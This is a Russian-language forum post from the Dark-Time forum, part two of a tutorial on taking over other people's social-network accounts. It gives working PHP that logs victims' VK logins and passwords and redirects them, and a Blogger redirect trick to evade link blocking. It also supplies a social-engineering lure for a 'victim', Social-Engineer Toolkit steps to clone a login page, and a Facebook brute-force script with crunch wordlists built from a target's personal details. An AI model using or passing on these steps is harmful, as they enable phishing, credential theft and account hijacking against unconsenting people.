Получение доступа к аккаунту социальной сети. Часть вторая

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

Morty

VIP

Morty

VIP
26 Окт 2017
537
113
Приветствую вас, дорогие друзья!

Сегодня мы продолжим изучать такую тему как "Получение доступа к аккаунту социальной сети". В прошлой части мы остановились на создании фишинга.

В этой части мы закончим создание нашего фишинг - сайта и приступим к разбору остальных тем которые более интересны.

Что же, а теперь создайте файл logs.php с таким содержимым:
Код:
<?php
     $login = $_POST['email'];
     $pass = $_POST['pass'];
     $file = fopen("my_pass.txt", 'at');
     fwrite($file,"Login --> $login\nPass --> $pass\n-----\n");
     fclose($file);
     echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vk.com'></head></html>";
?>
Файл test_fish.html , после того как пользователь введет данные, отправит их в logs.php

Этот файл запишет данные в файл my_pass.txt и перенаправит пользователя обратно на сайт вконтакте. Чтобы создать такой скрипт обратите внимание на атрибут method, а вернее на его значение. В моем случае данные переданы методом post. Также обратите на значение атрибута name. У вконтакте это email и pass. То есть если вы увидите примерно такой код
Код:
<form method = 'GET' action = 'http://mysite/login.php'>
<label> Login:</label>
<input type = "text" name = "login" />
<label> Password:</label>
<input type = "password" name = "passwd" />
<input type = "button" />
</form>
То начало нашего скрипта logs.php выглядело бы так
Код:
<?php
    $login = $_GET['login'];
    $pass = $_GET['passwd'];
.....
Наконец мы дошли до финальной части создания фишинга. Осталось закинуть все созданные файлы на хостинг.

В этом вам может помочь программа FileZilla(это на случай если вы любите простые вещи). Название сайта лучше создавать не похожее на название социальной сети. Часто из-за этого некоторые хостинги блокируют ваш фишинг. В итоге мы получаем вот это
e72f3557fb8285c592a043da7b7ae3fc.png
И после ввода некоторых данных убеждаюсь в стабильной работоспособности фишинга
45a05fb4b9e166d90c7808fb4c18a016.png
Практически всегда, если отправить пользователю чисто ссылку на фишинг то социальная сеть заблокирует ссылку. Есть много способов для обхода блокировки, но я для примера опишу вам лишь один.
  1. Регистрируем аккаунт в blogger.com(не реклама) --> создаем свой блог.
  2. Переходим к пункту Шаблон --> Изменить html.
  3. Сократите ссылку на ваш фишинг. Далее добавим следующий код перед тегом <head>
Код:
<meta content='0; url=сокращенная_ссылка' http-equiv='Refresh'/>
Теперь осталось сохранить.

В конце концов применим социальную инженерию. Здесь как раз таки понадобится информация которую мы собрали ранее. Напишем все той же "жертве" из примера что-то такое:
[QUITE]
Привет!
Недавно открыли фанфик. Там Сверхестественное выходит с крутой озвучкой
Держи <ССЫЛКА>
[/QUITE]
Setoolkit - фреймворк предназначенный для тестирования на проникновение и основанный на социальной инженерии.
На
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
я выбрал следующие пункты
Код:
set> 1
set> 2
set:webattak> 3
set:webattak> 2

#Далее вводим имя вашего хоста
#И url сайта который будем клонировать
Остается только сократить ссылку на получившийся фишинг, дать ее "жертве" и мониторить то что выведет set.

Brute Force

Очень сильно уязвим к подбору пароля - facebook. Я создал аккаунт в facebook и оставил много информации. Сегодня мы опираясь на эту информацию попробуем составить базу паролей и применим один старый скрипт для проведения brute force.

Вот внешний вид профиля

4ae7616a5ea1ee8dc8aeae1cbe0d5ead.png
Как я говорил ранее, будем записывать полученную информацию. Первое что бросается в глаза - это имя и фамилия. Смотрим далее и видим этот пост, сразу предполагая род деятельности

8765a94e6cb83bf55bdecf04c7650099.png
Просмотрев далее я нашел номер телефона пользователя. Проверив его на принадлежность к аккаунту начинаю брутить. Для этого понадобится скрипт
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


Распаковываем и далее пишем
Код:
chmod +x facebooker.pl
./facebooker <login> <wordlist>
e90fdb344f91c403fdfd00b5fdfdc6f6.png
Как видим на скрине, спустя некоторое время мы нашли пароль в простенькой базе.

Как создать базу:

После того как вы собрали информацию и поискав в топ базах не нашли пароля. То можно создать свою базу основываясь на собранной информации. Также в этом вам может помочь crunch. Создание своей базы может отнять уйму времени.

К примеру я создаю базу на пользователя имя которого Саня. Еще я предполагаю что Саня не такой умный и его пароль состоит из его имени и набора цифр. Тогда я получаю следующую команду
Код:
crunch 10 10 -t sanya.%%%% >> baza.txt
Эти 4 цифры могут быть какой-то определенной датой, как раз таки пройдемся по ним.

Повторяюсь, на создание своей базы можно убить очень много времени.


Как проверить принадлежность номера:

Помните в прошлой части я писал что при общении с "жертвой" мне удалось выудить много информации в числе которой был номер телефона?

Так вот давайте узнаем является ли этот номер логином данной страницы или нет.

Для примера снова вернусь к вконтакте. Переходим по "Забыли пароль"(мобильной версии). Пишем номер который удалось узнать и фамилию пользователя. Если пользователь с такими данными имеется, то ясно дело что номер который мы вводили ранее привязан к данной странице.

6f95a97530be7f8a1f68dffeb090f4fa.png
Значит что тот номер который я выудил привязан к странице данного пользователя.

А если не получилось, то постарайтесь узнать нет ли у данного пользователя фейка.

В следующей части закончим тему изучения этого способа.

А на этом часть 2 подошла к концу. До встречи в следующей части))
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя